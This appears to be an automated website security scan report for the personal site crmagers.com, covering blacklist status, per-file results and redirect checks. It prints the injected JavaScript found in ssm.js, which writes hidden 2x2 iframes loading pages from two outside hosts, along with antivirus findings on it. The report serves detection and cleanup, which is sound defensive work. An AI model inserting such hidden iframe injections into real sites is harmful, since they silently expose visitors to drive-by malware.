Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=crmagers.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://crmagers.com/ | 200 OK Content-Length: 1478 Content-Type: text/html | clean |
http://crmagers.com/ssm.js | 200 OK Content-Length: 5786 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://25348ada5parsel.com/ewes.html?j=1312688></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://internetmarketingxl.com/mhos.html?j=1312688></iframe>'); NS6 = (document.getElementById&&!document.all) IE = (document.all) NS = (navigator.appName=="Netscape" && if(ssmItems[i][4]!="no"&&barBuilt==0){buildBar();barBuilt=1} if(ssmItems[i][4]!="no"){document.write('</TR>')}} document.write('</table>') if (NS6){document.write('</TD></TR></TABLE>')} if (IE||NS6) {document.write('</DIV></DIV>')} if (NS) {document.write('</LAYER></ILAYER></LAYER>')} theleft=-menuWidth;lastY=0;setTimeout('initSlide();', 1)} Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://25348ada5parsel.com/ewes.html?j=1312688 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://25348ada5parsel.com/ewes.html?j=1312688> Hidden iFrame found. size: 2x2 src: http://internetmarketingxl.com/mhos.html?j=1312688 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://internetmarketingxl.com/mhos.html?j=1312688> | ||
http://crmagers.com/ssmItems.js | 200 OK Content-Length: 2256 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[731 bytes skipped]... nkFontFamily="Verdana"; linkFontSize="2"; linkBGColor="white"; linkOverBGColor="yellow"; linkTarget="_top"; linkAlign="Left"; barBGColor="black"; barFontFamily="Verdana"; barFontSize="2"; barFontColor="white"; barVAlign="center"; barWidth=13; barText="MENU"; ssmItems[0]=["Navigation"] ssmItems[1]=["Home Page", "http://www.crmagers.com", ""] ssmItems[2]=["Projects", "http://projects.crmagers.com",""] ssmItems[3]=["1965 Mustang", "http://stang.crmagers.com", ""] ssmItems[4]=["Message Forum", "http://forum.crmagers.com", "_new"] ssmItems[5]=["Photos", "http://photos.crmagers.com", ""] ssmItems[6]=["Resume", "resume/Resume_CMagers.pdf", "", 1, "no"] ssmItems[7]=["Contact", "Contact/index.html", "",1] buildMenu(); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://25348ada5parsel.com/ewes.html?j=1312688 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://25348ada5parsel.com/ewes.html?j=1312688> Hidden iFrame found. size: 2x2 src: http://internetmarketingxl.com/mhos.html?j=1312688 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://internetmarketingxl.com/mhos.html?j=1312688> | ||
http://crmagers.com/resume/Resume_CMagers.pdf | 404 Not Found Content-Length: 2444 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1688 Content-Type: application/x-javascript | clean |
http://crmagers.com/test404page.js | 404 Not Found Content-Length: 2444 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: crmagers.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 11:22:10 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 1478
Content-Type: text/html
Last-Modified: Sun, 08 Dec 2013 22:24:34 GMT
...1478 bytes of data.
GET / HTTP/1.1
Host: crmagers.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 11:22:10 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 1478
Content-Type: text/html
Last-Modified: Sun, 08 Dec 2013 22:24:34 GMT
...1478 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: crmagers.com
Referer: http://www.google.com/search?q=crmagers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: crmagers.com
Referer: http://www.google.com/search?q=crmagers.com
Result:
The result is similar to the first query. There are no suspicious redirects found.